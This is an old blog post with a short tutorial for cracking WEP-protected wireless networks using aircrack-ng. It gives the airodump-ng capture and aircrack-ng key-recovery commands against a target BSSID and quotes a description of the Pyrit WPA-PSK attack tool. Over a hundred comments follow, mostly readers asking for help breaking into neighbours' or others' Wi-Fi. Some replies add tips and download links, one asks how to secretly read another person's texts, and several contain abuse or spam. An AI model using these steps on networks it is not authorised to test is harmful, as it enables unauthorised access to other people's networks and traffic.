Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)

Aircrack-ng logo

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

UPDATE Oct 12 2008
A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

Related posts:

  1. Hack Wireless WEP Network
  2. Hack Wireless WPA Network
  3. Howto Hack a Wireless WEP Network
  4. Wireless: How To Secure Your Wireless Network
  5. ( hack wireless ) How to crack wepkey..easy way (winaircrak)
  6. Crack Cisco VPN (hack)
  7. Updated the entry on wireless network cracking
  8. How To Hack Wireless
  9. Hacking Wireless with Ubuntu
  10. WPA Crack Pyrit Aircrack

Popular Related Items »

136 Comments »

  1. Janus said,

    September 29, 2006 @ 17:44

    Informative :p

  2. .bootstrap » Updated the entry on wireless network cracking said,

    November 7, 2006 @ 21:03

    [...] Link to the the entry [...]

  3. Too EASY to Hack WEP said,

    January 20, 2007 @ 17:01

    I have tried to do as you described above and I must say it worked pretty well, it is just too easy to hack WEP based networks

  4. Elias Cebreros said,

    February 17, 2007 @ 23:58

    Is it possible to pass through WEP using a Sony PSP?

  5. wow said,

    February 28, 2007 @ 14:55

    Or a Nintendo DS for that matter.

  6. term said,

    April 3, 2007 @ 18:45

    interesting… as for the ds thing I cannot connect mine it says the key is invalid, of course should their be 4 boxes left untyped? maybe I didn’t get the whole code.

  7. black boy said,

    July 3, 2007 @ 3:34

    Ive got a question guys,
    i want to get into a wireless network but its protected with WEP.
    how do i get through!
    thanxx

  8. pspmaster said,

    July 18, 2007 @ 19:42

    if ur trying to get ur own wep go to internet and type 192.168.0.1 if that doesnt work email me at vas1566@hotmail.com

  9. pspmaster said,

    July 18, 2007 @ 19:45

    when u email me subject: wep help

  10. airwave said,

    July 29, 2007 @ 0:45

    to: black boy if is it your network try tutorial

    http://en.airdump.net/hacks/hacking-wifi-ultimate-ubuntu-guide/

  11. james said,

    August 6, 2007 @ 11:14

    helo people , i just wanna know i get a wireless network around my house but it connects without a web key and also when i try browsing on it , it shows the defult page on the my browser which i need to put a username and password.
    How do i crack into it because i have tried wifi radar didnt work.
    Advice cmcd@dbzmail.com

  12. Wallblom said,

    August 28, 2007 @ 14:11

    It says that i should get about 500k IVS, does that mean that i should wait until i have 500 000 beacons? because that is the only number increasing.

  13. Sebastian said,

    August 29, 2007 @ 15:08

    Cool man :-)
    Since I had too many problems with a sony vaio notebook to crack wep, I wrote a howto here:
    http://en.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html
    Cheers!

  14. Things that should matter » Catch 22 in Germany when it comes to IT-Security said,

    September 2, 2007 @ 23:00

    [...] So the big question now is when is an access point secured? Quite few users are still running with equipment that only supports WEP (Wired Equivalent Privacy or Wireless Encryption Protocol) encryption and this has been proved to be cracked in matter of minutes. Based on that, would the verdict still be the same if they’ve been using WEP-encryption to protect their network? Hopefully not, but quite a few would state that WEP encryption isn’t secure enough any more and since of that shouldn’t be used. To what extend do have to go to protect our self before we can feel safe against the law? [...]

  15. mike said,

    September 3, 2007 @ 21:40

    How about a PS3? or Wii?
    how do you hack a WEP using those?

  16. NooB said,

    September 30, 2007 @ 13:52

    Well, i have an unencrypted WiFi access point near my house at the moment and have downloaded some simple tools to use their own wifi card to crack others,(no drivers for my wifi card :s ) so ive used countless programs but the ive found “aircrack”, “airsnort” and “airpeek” three brilliant programs. Email me for details or the program itself !

  17. NooB said,

    September 30, 2007 @ 13:54

    Oh forgot to post my email ….DUH !
    Chaz_carnell@hotmail.co.uk….that should do it ;)

  18. Roopster said,

    October 3, 2007 @ 17:11

    if you know who you r hacking just type in the names and second names of the people u r hacking it always works for me

  19. Crooked Press » links for 2007-11-12 said,

    November 12, 2007 @ 5:24

    [...] » Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP) I guess WEP isn’t that secure after all. (tags: wifi wep crakc hacks linux) [...]

  20. Maestro said,

    November 13, 2007 @ 6:56

    Does this ony work on a Linux? I haven’t tried it on my Dell, but the whole page seems to indicate it’s Linux-based.

  21. lukee said,

    November 18, 2007 @ 3:26

    hi,does anyone know if i can hack a wireless network using windows xp pro and i have a belkin g+ notebook card.. thanks

  22. Krystof said,

    November 19, 2007 @ 20:26

    you must write to the Terminal on Linux or Mac, I have tried it on my mac

  23. yasras said,

    November 26, 2007 @ 17:36

    how do you install aircrack it has plenty files!

  24. yasras said,

    November 26, 2007 @ 17:37

    i know now lol sorry

  25. yasras said,

    November 26, 2007 @ 18:52

    one i have the wpa key can i connect to them?

  26. Randy said,

    December 3, 2007 @ 21:28

    I have the app properly installed but when i type
    sudo airodump-ng eth1
    it responds with “eth1is not a network interface”
    btw, I’m using ubuntu, gusty gibbon

  27. Rus said,

    December 6, 2007 @ 3:25

    Hehe, i’m using the VPN encrypted tunnel in my wireless network. Unhackable! :P May be u can use while hacking the WEP… I use http://strongvpn.com/

  28. james said,

    December 6, 2007 @ 20:16

    the only number that increases for me is the beacons
    the data and ivs never go up can anyone help please

  29. Boomer said,

    December 7, 2007 @ 6:28

    Hey Randi… Is your network eth1? try eth0 and if that doesnt work type iwconfig and it will show you your interface.

  30. caleb said,

    December 14, 2007 @ 15:02

    Hey,
    Im wondering if it is possible to hack the wep on my Palm TX?

  31. caleb also said,

    December 14, 2007 @ 15:04

    Email me if anyone finds anything on it please.
    cmgordo13@hotmail.com

  32. Rob said,

    December 26, 2007 @ 2:29

    IF ANYONE has any info on accessing a WiFi network that is security coded on an ipod Touch then please email me with all the goods :D

    Curious_haney@hotmail.com

    Cheers,

    Rob

  33. wouter said,

    December 31, 2007 @ 14:28

    hey; i just installed the program,,

    now i went to iwconfig because my network interface wasn’t ethl but wlan0 like you can see underneith. I always get a error that the divice is bussy or something.. what do i do wrong? I’m new with ubuntu..

    bkwb@kamer:~$ sudo airodump-ng eth1
    eth1 is not a network interface.
    bkwb@kamer:~$ iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wmaster0 no wireless extensions.

    wlan0 IEEE 802.11g ESSID:”"
    Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
    Retry min limit:7 RTS thr:off Fragment thr=2346 B
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    bkwb@kamer:~$ sudo airodump-ng wlan0
    ioctl(SIOCSIWMODE) failed: Device or resource busy
    Error setting monitor mode on wlan0

    pls help

  34. Chou Shoku said,

    January 26, 2008 @ 15:35

    Hey, im on windows vista. . . is anyone sure that this works on Vista? I have tried others but they failed completely. . . hope this works, anyway, if anyone else has vista and has another program that works absolutely perfectly on Vista please e-mail me on (graves-underdog@hotmail.co.uk)

  35. WEP Inquiry said,

    January 27, 2008 @ 16:23

    This may seem like a dumb question but if you hack into someones network will they be able to see you or tell that you have hacked into their network. The network name is call HackerInc. This Would be nice to know.

  36. Q said,

    January 31, 2008 @ 22:35

    Anyone know how to do this on windows?

  37. Slash11 said,

    February 4, 2008 @ 2:15

    i downloaded the air crack file but theres no channel system on it so i dont no what 2 do???

  38. Slash11 said,

    February 4, 2008 @ 2:37

    how do i install it?? there is no install wizard.and then what do i do .i have vista so i dont no if it works

  39. Re: Slash11 said,

    February 4, 2008 @ 10:54

    Hello Slash11,

    Well well – install wizards are for windows-santas not real network crackers

    You should stick with your crappy slow Windows Vista ;)

    Have a nice day.

  40. jkey said,

    February 22, 2008 @ 6:21

    hi.. there is wireless around my house. but it was protected by network password. how can i hack that? anyone can help me? email me at jackie_kennedy87@yahoo.com.my

  41. Ravi said,

    February 26, 2008 @ 13:03

    Hi I can see lot of wireless network connction around my house. but it was protected by network password. how can i hack that? can anyone help me??
    Pls email me at kunniyoorravi@gmail.com

  42. Luki said,

    March 12, 2008 @ 22:41

    hello people,
    i have wireless network in my house but it is password protected,please will someone email me how to crack it,
    i`m new in computers world and i saw all this comments and i didnt understand nothing,
    please email me step by step how to crack it and please send me the links where i can get all tools for cracking
    my OS is windows,
    my email is luki5@hotmail.com
    please send me all informations where to get the drivers.tools etc etc

  43. Nick said,

    March 15, 2008 @ 18:14

    First You should a mac Luki and then down load Aircrack then type the network name in one tb Text box

    ΤΟΘ ΣΘΨΚ

  44. Aamer said,

    March 19, 2008 @ 10:47

    i am using Access point Errocsson W20, i need to crack the terminal Password. Default Terminal webpage is 192.168.0.1.
    Need help.
    Access point Password is ok i can connect but i can’t login in Terminal page to change the setting.

  45. Treatment Center said,

    March 20, 2008 @ 9:51

    Treatment Center…

    The period of constantly hunting for dependable estimates having to do with this business have ended….

  46. ant said,

    March 27, 2008 @ 0:59

    hi, so many people need help on vista and windows, their time will come, im waiting for some sort of instructions on how to crack the keys, looked for ages but everyone says learn, yer sure but i wish I had the time or I would, I work alot but have no time to learn how to crack it, its out of my bounds lol, but if anyone knows about how to do this and has a how to guide ill donate you, either dont belive me or do its upto you but well ill try and ask because thats all i can do.

    anyway thnx and its antdemo45@gmail.com, ill even prove i have a flowing bank account online proving i have cash, not all my cash will be displayed just the donation will be shown.

    anyhow, thnx and cya

  47. Tim said,

    April 2, 2008 @ 13:15

    Hi all,

    im intrested in cracking wireless internet connections. If read alot about aircrack but got a question. When you actually got the Web key ( wich is hexadecimal numbers wright?) how can you connect with the network without actually knowing the pass?

  48. William said,

    April 5, 2008 @ 0:58

    Hi guys,
    I’ve been reading lots of tutorials over the internet just to find the answer of a questin but couldn’t find it. Probably u guys can help me, I would be very thankful to you. And my question is

    “There are a lots of wireless internet connections around my house and I want to get connected with any of them just to have internet access but all of them are password protected. Is there any (easy) way to do that.”

    I’ll really appreciate that if you can help me.
    MY email is rana4422@gmail.com

  49. William said,

    April 5, 2008 @ 1:02

    Sorry forgot to tell you I got dell machine and Windows XP home .

  50. Niel said,

    April 7, 2008 @ 14:42

    Well, – I think you should stick with a Linux live-cd like BackTrack.

    http://distrowatch.com/table.php?distribution=backtrack

    BackTrack is a SLAX-based live CD with a collection of security and forensics tools. It was created by merging Auditor Security Linux with WHAX (formerly Whoppix) and is a top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

    You can read more at:
    http://www.remote-exploit.org/backtrack.html

  51. Prasanna said,

    April 16, 2008 @ 11:11

    Please help me to connect in wireless network around my house. It was protected by network password. how can i hack that? can anyone help me??
    Pls email me at
    prasanna.ee@gmail.com

    i’m really happy if i can able to connect via wifi.

  52. Luigi said,

    April 28, 2008 @ 17:19

    Hey guys.
    I got the auditiory live linux cd.
    But u can’t seem to do anything with my wifi usb 2.0 adapter.

    Any help please?

  53. help_needed said,

    April 28, 2008 @ 21:45

    Hi uys,

    if i had an unprotected wireless router, how could i access a wired pc (c drive with no network set up)) that is connected to the router, without being able to get direct access to the router or the pc??

  54. poonam said,

    May 7, 2008 @ 15:38

    i need to connect wirelessly to an available wireless network in my place but it is secured with WEP. how can i get connected to it withour the hacking tools, etc. please help. email me at poonam_kaler@yahoo.com thanks.

  55. sliverbeak said,

    May 30, 2008 @ 17:43

    yo anyone i need help in cracking a wep key using windows and also not using aircrack/ or can someone help me in using aircrack and how to install it

  56. Michael said,

    May 31, 2008 @ 8:34

    There is a windows version available for download at http://www.aircrack-ng.org/doku.php

    http://download.aircrack-ng.org/aircrack-ng-0.9.3-win.zip

    I use as Linux Live-cd as Niel said.

  57. Sally said,

    June 24, 2008 @ 0:19

    I need to know how to crack a secured WEP using Vista. Is there any certain tools? What needs to happen? my email is mts2457@yahoo.com thanks

  58. HowTo crack (or hack) a wireless network with Wired Equivalent Privacy (WEP) « Geekzine.org said,

    July 7, 2008 @ 21:50

    [...] From: http://mediakey.dk/~cc/howto-crack-or-hack-a-wireless-network-with-wired-equivalent-privacy-wep/ [...]

  59. Pretty said,

    July 25, 2008 @ 14:22

    I had a wireless network of my own that I was paying for, but I fell behind on the bill. The company I was getting service through blocked me out of my own network. I can connect my computer to the network, but the web pages never load. Anyone have a clue how I can hack into my own network that they blocked me out of?

  60. tommy said,

    August 3, 2008 @ 23:41

    hey, anyone know how to get into a wlan network which you dont know the wep or wpa key. (i’m not even sure which the network uses)

  61. Amin said,

    August 16, 2008 @ 12:25

    Hi,
    I hav wireless internet connection (WPA/WEP both) around me.
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it……….
    I am using Windows Vista. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details ……….

    waiting for hopeful replies for me……… ;)

  62. Amin said,

    August 16, 2008 @ 12:30

    Hi,
    I hav wireless internet connection (WPA/WEP both) around me.
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it……….
    I am using Windows Vista. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details ……….
    My mail address is amin532@gmail.com…………..
    Anyone … any links of ideas………. plz…. forward me..
    waiting for hopeful replies for me………

  63. RAQ said,

    August 20, 2008 @ 23:54

    Hello everyone, I have a netbook running windows XP and a laptop running vista. I am a novice whwn it comes to hacking secured wifi hotspots, is there any easy/fast way of doing so. I will appreciate any help what so ever. Please could you e-mail me at ( ihopeyoudieintheworstpossibleway@hotmail.co.uk )

  64. Allen said,

    August 23, 2008 @ 0:34

    I found there is a wireles signal being broadcasted through my apartment. I only wish to acsess it but it locked by a WEP Key. I was wondering if anyone knew how to bypass that or help me get the key. I have a PS3 and Laptop. I want the signal so I can use my ps3 on it. Is there anything I can do?

    Thanx in advance for your time

    You can email me @ abowman88@tmail.com

  65. REv said,

    September 2, 2008 @ 14:30

    I have like 3 wifi networks around my house and that all have PW’s..
    Is it possible to get on them with my Iphone?
    Can i crack em?
    THanks

  66. frEzzo said,

    September 14, 2008 @ 20:07

    Hi I can see lot of wireless network connection around my house. but it was protected by network password WEP. how can i hack that?i’m using windows. can anyone help me??please email me step by step how to crack it..
    Email me at rezzo_88@yahoo.com thanks!!

  67. TheIneffable said,

    September 16, 2008 @ 22:28

    I have a few protected wifi networks in my neighborhood. There is one that I can access without cracking since it has a plain password I guessed, but its not fully setup.

    I have tried writing the .ico programs to run on my comp and I’m not having much success. Is there a way to crack WEP networks with available software by installing straight to the comp or an external disc such as SD Card or USB?

    My email is thynameisjamar@gmail.com. Thanks for the support!

  68. AndrewBrookes said,

    September 22, 2008 @ 20:09

    Hi my name is andrew and i am wondering if any one can tell me how to hack a wep using my ps3 please.

  69. Mono said,

    October 8, 2008 @ 3:36

    Hello, i see a lot wireless network around my neighbourhood but it is password protected.So, How to hack it?someone can help me?BTW, i’m currently using Window and can be considered as new in comp tecnology.
    Pls me at letupandiudara@yahoo.com.my…Thanks

  70. Mitchell B said,

    October 9, 2008 @ 11:14

    is it really easy for people to hack into my computer on open wi-fi networks? Like I’m staying at a hotel right now and some people i’m with won’t use their computer here because they’re afraid that somebody can get into their computer and … play solitaire or whatever these hackers do. they won’t be getting much from me besides b-day pics and school essays and a bunch of truck/knife/food type stuff. I’m just wondering if it’s really worth worrying about people getting into my computer. I have Trend Micro Internet Security Pro and XP pro.

    can somebody still get into my stuff while I’m logged on the internet?

    Please somebody respond if you know anything about this type of stuff:

    mitchellRbrown@hotmail.com

  71. Met said,

    October 15, 2008 @ 0:06

    okay so can u post all that again so that it will put all the info to a .ivs file and not a .cap since mine wont take the ivs needed from a .cap file

  72. WPA HELP said,

    October 20, 2008 @ 4:09

    To all the people trying to get into a WEP network, just type in 10 zeros. Thats the default password. Now does anyone here know how to get into a WPA network. all i wanna do is play online with my PS3. i got into 2 WEP nets but the signal is weak but the one that is really strong is WPA secured and i have no idea how to get in. Please Help.

  73. JASON SMITH said,

    November 7, 2008 @ 15:54

    hi,thanks for sharing info.
    now,i crack wireless secure use windows+vmware+usb wifi.
    very simple,fast and excllent!! i can get the password around 3minute..
    very-very faster.and i don’t have type any command,just type 1,2,3,4 finish!!
    dont remember many command.

    for find tutorial here http://wireless-security-system.blogspot.com

  74. WEP CRACKING IN 3 MINUTE USE WINDOWS said,

    November 7, 2008 @ 15:59

    FIND TUTORIAL CRACKING WIRELESS USE WINDOWS HERE
    >>TUTORIAL CRACK WIRELESS USE WINDOWS<<

  75. Amin said,

    December 2, 2008 @ 13:49

    Hi again all,
    I hav wireless internet connection (WPA/WEP both) around me.
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it……….
    I am using Windows Vista. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details ……….
    My mail address is amin532@gmail.com…………..
    Anyone … any links of ideas………. plz…. forward me..
    waiting for hopeful replies for me………

  76. jazzylay said,

    January 7, 2009 @ 4:43

    I have both WPA/WEP wireless internet connections around me. (The WEP is stronger so I prefer help with that one)
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it……….
    I am using my laptop. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details ……….
    My mail address is jazzylay000@gmail.com …………..

  77. jazzylay said,

    January 7, 2009 @ 4:55

    I have both WPA/WEP wireless internet connections around me. (The WPA is stronger so I prefer help with that one)
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it……….
    I am using my laptop. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details ……….
    My mail address is jazzylay000@gmail.com …………..

  78. jazzylay said,

    January 7, 2009 @ 4:59

    Sorry I ment The WPA is stronger so I prefer help with that one.

  79. borat said,

    January 9, 2009 @ 4:20

    the person posting this can’t even help people with their problems what a fucking dumb cunt don’t post something you got off someone elses site and claim it is ours if you don’t know how to fucking use it

    FFFFFFFFFFFFF AAA GGGGGGGG
    FFFFFFFFFFFFF AAAA GGGGGGGG
    FFFFF AAAAA GGG
    FFFFFFFFFFFFF AAA AA GGG
    FFFFFFFFFFFFF AAAA AAA GGG GGGG
    FFFFF AAAAAAAAAA GGG GG
    FFFFF AAAAA AAAA GGGGGGGG
    FFFFF AAAAAA AAAAA GGGGGGGG

  80. bmajor said,

    January 20, 2009 @ 9:39

    Please help me to connect in wireless network around my house. It was protected by network password. how can i use that because i need it for some topics on those i have to do searches? can anyone help me??
    Pls email me at: tsjbedel@yahoo.fr

    i will be really happy if i can able to connect via wifi.

  81. Cesar said,

    January 20, 2009 @ 12:30

    Hi,

    I don´t know nothing on how to use Linux. I have a laptop HP Pavilion dv6000 whit Win Vista Home basic. Can i crak a WEP protected wireless network? If YES then (go to :) ) whit what? And how? Could anybody please help. E-Mail: zaza_dragon@yahoo.com

    I also have a Win XP PRO, desktop computer but it´s an old AMD ATHLON. I have a Wi-FI device on him. Can i use that to crack the network?
    Please help. E-mail. zaza_dragon@yahoo.com.

  82. chandru said,

    February 4, 2009 @ 13:53

    Hi,
    I hav wireless internet connection (WPA/WEP both) around me.
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it……….
    I am using Windows Vista. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details ……….
    My mail address is chandru26rpt@gmail.com…………..
    Anyone … any links of ideas………. plz…. forward me..
    waiting for hopeful replies for me………

  83. jade said,

    March 15, 2009 @ 20:37

    i have a lap top wif wireless and want to hack a network key because it wont let me go on line unless i have a network key can i hack that ?????????

  84. big al said,

    March 24, 2009 @ 1:18

    In short i need to crack into my my friends WiFi and i have no clue what to do please help me someone its for schooll?thanks a million.

  85. C Mott said,

    March 25, 2009 @ 20:46

    I can pick up signal from my neighbors wi-fi on my computer but they have it blocked. I was wondering if there was any way that I could still get on their wi-fi.

  86. jas said,

    March 31, 2009 @ 22:49

    hey. i have a few wireless networks in my area, but they’re all password protected (just WEP though). i need to hack into one of their connections. can someone please email me and tell me how?

    jkaur@moreaucatholic.org

  87. david whitmer said,

    April 4, 2009 @ 16:42

    can i get someone’s texts from their cell phone. without them knowing, and is this agaisnt the law

  88. david whitmer said,

    April 4, 2009 @ 16:44

    can i get someone’s texts, without them knowing, and is this agaisnt the law. email me back please.

  89. Sazid Rahman said,

    April 6, 2009 @ 17:19

    Can i use Kubuntu, instead of Debian for this purpose??

  90. kone1972 said,

    April 8, 2009 @ 21:56

    is there anyone out there that can help me crack wep or even wpa wireless networks? i have aircrack but it does’nt seem to work as it does not recognise dll files?? i use windows xp and work via my laptop, which is wireless. if anyone can give me a few pointers or info how to download a working copy i would be most grateful. thanks.

    kone1972@hotmail.co.uk

  91. Faisal said,

    April 9, 2009 @ 18:01

    I need the name and instructions to crack a wep security only .Please let me know at my EMAIL ID=faisalmw11g8@yahoo.com

  92. Faisal said,

    April 9, 2009 @ 18:04

    I need the name and instructions of that software which can crack WEP security.Also let me know that where i can download it at my EMAIL ID=faisalmw11g8@yahoo.com urgent please.

  93. nice said,

    May 12, 2009 @ 5:03

    how do i hack into email password

  94. Pietro said,

    June 25, 2009 @ 6:30

    Pls my network searches and get an unsecured wireless network but when i try to connect it requires for USER NAME and PASSWORD.
    How do i bypass this network…
    Thanks all for your cooperation

  95. David said,

    June 29, 2009 @ 14:25

    Can someone please help me hack a WEP secured network? I would like to play online games with my Nintendo DS. It is secured with WEP encrpytion so does anyone know how to bypass this? I have a Compaq Laptop with Windows Vista. The radio type of the network is 802.11g. Is this possible to bypass it because I really want to. If you could guide me please e-mail me at bloodblitzer@hotmail.com
    Thanks in advance

  96. help said,

    July 4, 2009 @ 4:58

    dose anyone know how to hack a wep with a wii send to kyle5342@gmail.com

  97. Hen Dawg said,

    July 13, 2009 @ 6:07

    Hello everyone.
    I hav wireless internet connection (WPA/WEP both) around me.
    I wana use them but I dont know the WPA/WEP passkey.
    Help me with it¦.
    I am using Windows Vista. I request the Windows version of the software for full and easy crack.
    Mail me the software, link & the cracking process details¦.
    My mail address is Hendric.Barthley@yahoo.com…………..
    if you have any links of ideas plz forward me..

    Preciate it…

  98. Brandon said,

    August 2, 2009 @ 7:26

    Still, I know it’s been asked a million times, but how do you use Vista to hack? Also, can the ps3 hack into networks? or do you have to turn it into a linux

  99. Brandon said,

    August 2, 2009 @ 7:26

    oh by the way my email is acores_benfica@hotmail.com

  100. pawi said,

    September 11, 2009 @ 2:37

    I don’t how to install aircrack-ng.I’ve downloaded the file but i don’t know how to begin to install it.Can anyone plaese help me?
    My email is pawi_69@hotmail
    Thanks

  101. jami1866 said,

    September 11, 2009 @ 10:27

    can you take it with me step by step im using a grimace (Intel(R) PRO/Wireless 3945ABG Network Connection) with aircrack-ng-1.0-rc4-win
    new and dont have much intheret to download programs to crack the wep i have a telstra usb i have spent $25 trieng to crack this wep help

    the wep has
    .radio type=802.11g
    .SSID= Grimace
    .signal strength= low-week

    ps this is a laptop with vista

  102. ama said,

    September 27, 2009 @ 21:35

    hi my laptop has found 2 wirless connection problem is… ther both locked with a network key and am not able to crack it can you help please? one of the users is a bthomehub2-5596

  103. Tyni said,

    November 6, 2009 @ 16:00

    Hi, can someone email me a link for what i need to download and instructions on how to hack a wep using a ps3-see loads of reqs for this but no answers…help!

  104. Tyni said,

    November 6, 2009 @ 16:01

    (sebtyni@yahoo.co.uk by the way)

  105. Azli said,

    December 3, 2009 @ 8:22

    Hi, i using windows 7 64 bit on my laptop.. can teach me how you do it…
    Trying new things like this is xcitet to me.. please email to (zelilatip@gmail.com)…
    at least.. with your explanation or step by step… ;)

  106. wityee said,

    December 5, 2009 @ 9:17

    hi everyone,
    hi found a wireless connection a round my home.Don’t known their password to pass.Is there anyone who known how to crack this password key???? and detail procedure of how to crack……………..My mail add is wityeechanchan@gmail.com ……………..If i get this procedure to how to hack , i will be very happy :) HHHEEELLLPPPP MMMEEEE

  107. naeem said,

    December 10, 2009 @ 20:39

    i use Eee pc N270. i have many wireless coming in many home but all of them wep lock. can any one help me to crack the password by give me some adivce and showing me. if you want help contact me on naeemriaz2007@yahoo.com. i use windows xp

  108. raheem said,

    December 29, 2009 @ 2:03

    hey every one i have a ? i just bought a ps3 250g and i was wondering if i could hhack some else internet connection even if their is a password needed if so i need some help pleas Email me blackpapi15@yahoo.com
    thanks

  109. Barry said,

    December 30, 2009 @ 0:43

    How could I hack on using an Ipod Touch when I’m at college or in the pub
    Thanks

  110. Just in said,

    December 30, 2009 @ 23:49

    Hey so im wondering if there is any way hack my way through one of these WEP secured connections with my PSP. they are the only ones with 90+ percent signal strength. If there is anyone out there with knowledge on doing this it would be wonderful if i knew the secret!!! PLEASE HELP ME! email me with all the help. THANK YOU
    jbeilharz@email.itt-tech.edu

  111. Eric said,

    January 3, 2010 @ 1:00

    how do i hack a wep key for a ps3.. im tryna use the wireless internet to get on the playstation network. can someone help me or tell me how

    email me at yungntatted@tmo.blackberry.net

    -THANKS!

  112. Kevin said,

    January 20, 2010 @ 11:04

    am having alot of wireless signalz around my house,can somebody help me how to hack for the pass key for WPA.plz email me kevosparks@yahoo.com

  113. Jessica said,

    January 21, 2010 @ 11:25

    ok like all the other people on here I have quite a few wireless connections around me but all are locked and the ones that aren’t have little to no signal. Can someone email me and let me know if there is a way to get passkeys or passphrases so that I may get a better signal? All4u2wonder2003@yahoo.com thank you sooo very much

  114. mikel said,

    January 21, 2010 @ 22:41

    Hi every one i had LAN network in my house but for one or two months i had not paid my bills so my ISP blocked me any time i try to connect i will be connected but my web page cannot load is their any way i can hack into the network : plzzzzzzzzzz help

  115. mikel said,

    January 21, 2010 @ 23:15

    hi , i had download aircrank-ng but i saw a lot of drivers i dont know whta to do can any one here help to use use to WAP

  116. pike said,

    February 10, 2010 @ 22:02

    how to crack linksys wireless network.it is unsecured but I can’t go on web just local connection?please help

  117. eddyboy said,

    February 18, 2010 @ 19:57

    how do i use a WEP signal on my ps3 without knowing the password

  118. eddyboy said,

    February 18, 2010 @ 19:59

    seriously getting pissed at the fact i have no online on my ps3 and im not being allowed to use my own computer to go online with my ps3 someone please help

  119. eddyboy said,

    February 18, 2010 @ 20:00

    some one please help

  120. Arpita said,

    March 1, 2010 @ 17:52

    please some1 email me a software that would help me to know the password of a wifi network in the range of my computer so that i can use it.
    please! please! please! send me such a software wether b a demo version or full version with key…………..on – librarie_007@rediffmail.com

    thanks guys please anyone help me….

  121. Axel said,

    March 19, 2010 @ 6:20

    i can oni open the aircrack-ng GUI and i can’t seem to find a search button oni launch button .. hm? anyone can help ?- axsk8er_92@hotmail.com -

  122. Jason said,

    March 26, 2010 @ 21:26

    I have lots of Wireless networks next to my house. And every time i download aircrack files are missing can someone help ?

  123. ckie said,

    April 17, 2010 @ 11:58

    Hello, i see a lot wireless network around my neighbourhood but it is password protected.So, How to hack it?someone can help me?im using window….please email me ckirn88@hotmail.com….thanks…:)

  124. Sonico said,

    April 28, 2010 @ 23:03

    I alway see many wireless signal on my pc, but need thire WPA/WEP password to play games with. Pls can someone esplain to me on how to get them?

  125. ZARRAR said,

    May 13, 2010 @ 15:06

    hi..
    how am i suppose to install aircrack on windows vista?? and how to use it. I want to hack into a wireless network.. please mail me at zarrardevil@hotmail.com

  126. match said,

    May 21, 2010 @ 9:42

    hi my computer is window 7….and i want a software that would help me to know the password of a wifi network in the range of my computer so that i can use it. pls email me at matchtang@hotmail.com

  127. Ashok said,

    June 5, 2010 @ 2:44

    i have ipod touch and i want to surf Wi-Fi from it but all are locked. is there any idea to hack the password of wi-fi from ipod touch

  128. karl said,

    June 5, 2010 @ 12:04

    Hey, im on windows vista. . . is anyone sure that this works on Vista? I have tried others but they failed completely. . . hope this works, anyway, if anyone else has vista and has another program that works absolutely perfectly on Vista please e-mail me on

  129. karl said,

    June 5, 2010 @ 12:06

    email me on k.jack89@hotmail.com

  130. karl said,

    June 5, 2010 @ 12:08

    email me on k.jack89@hotmail.com help me

  131. Babes said,

    June 9, 2010 @ 2:20

    Hi guys,
    I’ve been reading lots of tutorials over the internet just to find the answer of a question but couldn’t find it. Probably u guys can help me, I would be very thankful to you. And my question is

    “There are a lots of wireless internet connections around my house and I want to get connected with any of them just to have internet access but all of them are password protected. Is there any (easy) way to do that.?

    I’ll really appreciate that if you can help me.
    email me at aahoneybabes@yahoo.com

  132. Babes said,

    June 9, 2010 @ 2:21

    My OS is Windows 7 Thanks
    email me at aahoneybabes@yahoo.com

  133. Babes said,

    June 9, 2010 @ 2:23

    My OS is Windows 7
    Please Help thanks email me at aahoneybabes@yahoo.com

  134. RaheeL ChohaN said,

    June 28, 2010 @ 21:35

    ASLAMA ALYKUM everyone.
    I hav WIFI internet connection around me.
    I wana use them but I dont know the password
    Help me with it¦.
    I am using Windows XP Service pack2. and i have nokia Nokia 5800 Xpress
    Mail me the software, link & the cracking process details
    My mail address is RaheeL_ChohaN@msn.com
